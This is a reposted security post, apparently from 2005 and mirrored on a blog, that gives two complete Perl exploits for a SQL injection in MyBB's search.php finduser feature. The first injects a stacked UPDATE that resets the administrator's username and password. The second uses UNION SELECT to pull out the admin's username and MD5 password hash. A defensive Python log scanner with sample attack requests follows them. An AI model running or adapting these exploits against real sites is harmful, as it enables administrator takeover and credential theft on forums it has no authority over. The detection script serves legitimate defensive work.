MyBB finduser Search SQL Injection (Exploits)

Original post, Database Development Technology. Author: coolwinds. Posted: 2005-08-21 21:37:46
The following two exploits target a vulnerability in MyBB's finduser search functionality: one tries to add a user named crouz with administrative privileges to the system, while the other grabs the first available administrative username and dumps its hashed password.

Credit:
The information has been provided by Alpha Programmer and Devil-00.

Exploits #1:
#!/usr/bin/perl
###########################################
# Crouz.Com Security Team #
###########################################
# EXPLOIT FOR: MyBulletinBoard Search.PHP SQL Injection Vulnerability #
# #
#Expl0it By: A l p h a _ P r o g r a m m e r (sirius) #
#Email: Alpha_Programmer@LinuxMail.ORG #
# #
#This Xpl Change Admin's Pass For L0gin With P0wer User #
# #
#HACKERS PAL & Devil-00 & ABDUCTER are credited with the discovery of this vuln #
# #
###########################################
# GR33tz T0 ==> mh_p0rtal -- Dr-CephaleX -- The-Cephexin -- Djay_Agoustinno #
# No_Face_King -- Behzad185 -- Autumn_Love6(Hey Man You Are Singular) #
# #
# Special Lamerz : Hoormazd & imm02tal :P ++ xshabgardx #
###########################################
use IO::Socket;

if (@ARGV < 2)
{
print "\n==========================================\n";
print " \n -- Exploit By Alpha Programmer(sirius) --\n\n";
print " Crouz Security Team \n\n";
print " Usage:\n\n";
print "==========================================\n\n";
print "Examples:\n\n";
print " Mybb.pl www.Site.com /mybb/ \n";
exit();
}

my $host = $ARGV[0];
my $dir = $ARGV[1];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "C0nn3cted\n";

# Raw HTTP/1.0 request; the query string is sent unencoded, as in the original post.
$http = "GET $dir/search.php?action=finduser&uid=-1' ; update mybb_users set username='da05581c9137f901f4fa4da5a958c273' , password='da05581c9137f901f4fa4da5a958c273' where usergroup=4 and uid=1 HTTP/1.0\n";
$http .= "Host: $host\n\n\n\n";


print "\n";
print $remote $http;
print "Wait For Changing Password ...\n";
sleep(10);

print "OK , Now Login With :\n";
print "Username: crouz\n";
print "Password: crouz\n\n";
print "Enjoy ;)\n\n";

Exploits #2:
#!/usr/bin/perl -w
use LWP::Simple;
if(!$ARGV[0] or !$ARGV[1] or !$ARGV[2]){
print "#########[ MyBB SQL-Injection ]##############\n";
print "# Coded By Devil-00 [ sTranger-killer ] #\n";
print "# Exmp:- mybb.pl www.victem.com mybb 0 0 || To Get Search ID #\n";
print "# Exmp:- mybb.pl www.victem.com mybb searchid 1 || To Get MD5 Hash #\n";
print "# Thnx For [ Xion - HACKERS PAL - ABDUCTER ] #\n";
print "######################### #########\n";
exit;
}

my $host = 'http://'.$ARGV[0];
my $searchid = $ARGV[2];

if($ARGV[3] eq 0){
print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=finduser&uid=-1' UNION SELECT uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,uid,username,password FROM mybb_users where usergroup=4 and uid=1/*";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";
# The HTML-tag pattern between the slashes of this regex did not survive in this copy of the post.
$page =~ m// && print "[+] Search ID To Use : $1\n";
exit;
}else{

print "[*] Trying $host\n";

$url = "/".$ARGV[1]."/search.php?action=results&sid=$searchid&sortby=&order=";
$page = get($host.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $host\n";

# The HTML tags around the capture groups in the next two regexes did not survive in this copy of the post.
$page =~ m/(.*?)/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);

$page =~ m/(.*?)/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
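As a defender-side complement added here (not part of the original post or of MyBB itself), the following Python script scans Apache Common Log Format lines for the two request shapes the exploits above send to search.php: a non-numeric finduser uid carrying a stacked UPDATE, and one carrying a UNION SELECT. The log lines, timestamps and IP addresses are constructed samples.

```python
import re
from typing import Optional
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (not from the original post): a benign
# finduser lookup, the two injection shapes the exploits above send, and an
# unrelated request. IPs are documentation-range placeholders.
SAMPLE_LOG = """\
203.0.113.5 - - [21/Aug/2005:21:37:46 +0800] "GET /mybb/search.php?action=finduser&uid=42 HTTP/1.1" 200 5120
203.0.113.9 - - [21/Aug/2005:21:38:01 +0800] "GET /mybb/search.php?action=finduser&uid=-1'%20%3B%20update%20mybb_users%20set%20password='x'%20where%20uid=1 HTTP/1.0" 200 812
203.0.113.9 - - [21/Aug/2005:21:38:30 +0800] "GET /mybb/search.php?action=finduser&uid=-1'%20UNION%20SELECT%20uid,username,password%20FROM%20mybb_users/* HTTP/1.1" 200 4401
203.0.113.7 - - [21/Aug/2005:21:39:00 +0800] "GET /mybb/index.php HTTP/1.1" 200 9001
"""

# Common Log Format prefix: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d+)'
)

def classify_uid(uid: str) -> Optional[str]:
    """Label a decoded finduser uid value, or return None when it is a plain integer (or absent)."""
    if re.fullmatch(r"-?\d*", uid):
        return None  # finduser legitimately takes only a numeric user id
    low = uid.lower()
    if re.search(r"\bunion\b.*\bselect\b", low):
        return "union-select (data extraction)"
    if re.search(r";\s*(update|insert|delete|drop)\b", low):
        return "stacked-query (data modification)"
    return "non-numeric uid (probable injection probe)"

def scan_log(text: str) -> list:
    """Return one finding dict per suspicious finduser request in the log text."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not in Common Log Format; skip
        parts = urlsplit(m["target"])
        if not parts.path.endswith("/search.php"):
            continue
        qs = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
        if qs.get("action", [""])[0] != "finduser":
            continue
        uid = qs.get("uid", [""])[0]
        label = classify_uid(uid)
        if label:
            findings.append({"ip": m["ip"], "ts": m["ts"], "label": label, "uid": uid})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['label']}: uid={f['uid']!r}")
```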

From ITPUB博客, link: http://blog.itpub.net/83980/viewspace-804884/. To reprint, please credit the source; otherwise legal action may be taken.
